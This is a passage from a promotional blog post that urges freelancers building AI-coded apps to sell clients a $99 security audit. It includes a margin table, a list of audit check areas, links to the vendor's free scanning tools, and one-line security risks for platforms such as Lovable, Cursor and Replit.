&lt;p&gt;"I've built your app. Before we go live, I recommend a security audit to make sure your users' data is protected. It's $99 and takes 24 hours. You'll get a full report showing exactly what's secure and what needs fixing."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Client hears: professional, thorough, protective of their business.&lt;/p&gt;

&lt;p&gt;You hear: $99 in margin on a deliverable you didn't build.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Math
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;Your Fee&lt;/th&gt;
&lt;th&gt;Audit Cost&lt;/th&gt;
&lt;th&gt;Your Margin&lt;/th&gt;
&lt;th&gt;Client Gets&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;No audit&lt;/td&gt;
&lt;td&gt;$500&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;td&gt;$500&lt;/td&gt;
&lt;td&gt;Vulnerable app + liability&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;With audit&lt;/td&gt;
&lt;td&gt;$599&lt;/td&gt;
&lt;td&gt;$99&lt;/td&gt;
&lt;td&gt;$500&lt;/td&gt;
&lt;td&gt;Secure app + peace of mind&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Same margin. Better deliverable. Lower liability. Recurring revenue if client wants monthly scans.&lt;/p&gt;

&lt;h2&gt;
  
  
  What a $99 Audit Covers
&lt;/h2&gt;

&lt;p&gt;A real audit checks 50+ security vectors specific to vibe-coded apps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Authentication &amp;amp; Authorization&lt;/strong&gt;: RLS policies, JWT validation, admin routes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secrets Management&lt;/strong&gt;: Exposed API keys, env vars in client code, .git exposure&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Input Validation&lt;/strong&gt;: SQL injection, XSS, path traversal&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;API Security&lt;/strong&gt;: Rate limiting, CORS configuration, error handling&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Supply Chain&lt;/strong&gt;: Dependency versions, known vulnerabilities, lockfile integrity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Infrastructure&lt;/strong&gt;: Security headers, HTTPS enforcement, cookie flags&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You get a report with every finding, severity rating, and a copy-paste AI prompt to fix each issue.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://notelon.ai/services/audit/sample" rel="noopener noreferrer"&gt;See a sample audit report&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Free Tools to Start With
&lt;/h2&gt;

&lt;p&gt;Before you upsell audits, run your own builds through these:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/tools/vibecheck" rel="noopener noreferrer"&gt;VibeCheck Scanner&lt;/a&gt;&lt;/strong&gt; -- Paste your repo URL. Get a security score in 30 seconds. Free.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/tools/security-assessment" rel="noopener noreferrer"&gt;Security Assessment Quiz&lt;/a&gt;&lt;/strong&gt; -- 10 questions. 2 minutes. Know your risk grade.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/tools/breach-cost-calculator" rel="noopener noreferrer"&gt;Breach Cost Calculator&lt;/a&gt;&lt;/strong&gt; -- Show your client what a breach would cost them. Makes the $99 audit feel like nothing.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Platform-Specific Risks
&lt;/h2&gt;

&lt;p&gt;Every vibe coding tool has different security blind spots:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/guides/lovable-security" rel="noopener noreferrer"&gt;Lovable&lt;/a&gt;&lt;/strong&gt;: RLS disabled by default, Supabase keys in client code, 200K daily projects with 63% non-developer users&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/guides/bolt-security" rel="noopener noreferrer"&gt;Bolt.new&lt;/a&gt;&lt;/strong&gt;: No built-in security scanning, manual deployment to any platform, no guardrails&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/guides/cursor-security" rel="noopener noreferrer"&gt;Cursor&lt;/a&gt;&lt;/strong&gt;: MCP plugin supply chain attacks, .cursorrules injection, terminal command execution&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/guides/windsurf-security" rel="noopener noreferrer"&gt;Windsurf&lt;/a&gt;&lt;/strong&gt;: Cascade autonomous execution, Memories storing sensitive data, cloud/local confusion&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://notelon.ai/guides/replit-security" rel="noopener noreferrer"&gt;Replit&lt;/a&gt;&lt;/strong&gt;: Agent controls entire stack (code + DB + deployment), public-by-default repos, rogue agent incident (July 2025)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The Bottom Line
&lt;/h2&gt;

&lt;p&gt;You're building apps faster than ever. That's the upside.&lt;/p&gt;

&lt;p&gt;The downside: you're shipping vulnerabilities faster than ever too. Your clients trust you to deliver something that works AND doesn't leak their data.&lt;/p&gt;

&lt;p&gt;A $99 security audit takes 24 hours and covers 50+ checks. It protects your client, protects you from liability, and adds margin to every project.&lt;/p&gt;

&lt;p&gt;Or skip it. And hope nobody finds the RLS bypass before your client's data shows up on a breach notification site.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;&lt;a href="https://notelon.ai/services/audit" rel="noopener noreferrer"&gt;Get a security audit for your next client project&lt;/a&gt;&lt;/strong&gt; -- $99 for a full 50+ check assessment with actionable fix prompts. Results in 24 hours.&lt;/p&gt;

</description>
      <category>security</category>
      <category>webdev</category>
      <category>freelancing</category>
      <category>vibecoding</category>
    </item>
  </channel>
</rss>
